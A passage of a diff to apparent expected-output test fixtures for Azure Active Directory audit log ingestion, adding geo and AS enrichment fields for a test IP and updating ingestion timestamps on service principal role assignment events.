"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735126\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"a385881d-d5e8-47b0-83ea-d50d6c9906e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -8828,6 +9380,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -8994,7 +9558,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125107100Z", + "ingested": "2021-12-14T14:48:43.176697767Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735117\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"227bc85c-0c21-4df3-9e11-3a24f104e1e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -9021,6 +9585,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -9187,7 +9763,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125113600Z", + "ingested": "2021-12-14T14:48:43.176698549Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735117\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"227bc85c-0c21-4df3-9e11-3a24f104e1e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -9214,6 +9790,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -9380,7 +9968,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125120100Z", + "ingested": "2021-12-14T14:48:43.176699293Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735126\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"a385881d-d5e8-47b0-83ea-d50d6c9906e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -9407,6 +9995,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -9573,7 +10173,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125127Z", + "ingested": "2021-12-14T14:48:43.176700143Z", "original": 